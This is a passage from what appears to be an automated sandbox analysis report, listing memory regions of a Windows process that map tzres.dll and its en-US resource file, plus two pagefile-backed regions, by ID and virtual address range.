start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3066 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3067 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3068 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3069 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3070 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3071 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3072 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3074 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3075 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3076 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3077 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3078 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3079 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3080 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3081 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3082 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3083 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3084 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3085 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3086 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3087 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3089 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3090 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3091 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3092 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3093 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3094 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3095 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3096 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3097 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3098 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3099 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3100 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3101 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3102 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3103 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3105 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3106 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3107 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3108 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3109 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3110 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3111 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3112 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3113 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3114 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3115 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3116 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3118 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3119 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3120 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3121 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3122 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3123 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3124 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3125 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3126 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3127 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3128 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3129 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3130 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3131 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3132 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3133 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3134 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3135 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3136 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3137 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3138 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3139 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3140 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3141 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3142 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3143 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3144 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3145 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3146 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3147 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3148 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3149 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3151 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3152 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3154 start_va = 0x2a0000 end_va = 0x2a2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3160 start_va = 0x2b0000 end_va = 0x2b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 3161 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3162 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3163 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3164 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3165 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3166 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3167 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3168 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3169 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3170 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3171 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3172 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3173 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3174 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3175 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3176 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3177 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3178 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3179 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3180 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3181 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3182 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3183 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3184 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3185 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3186 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3187 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3188 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3189 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3190 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3191 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3193 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3194 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3195 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3196 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3197 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" 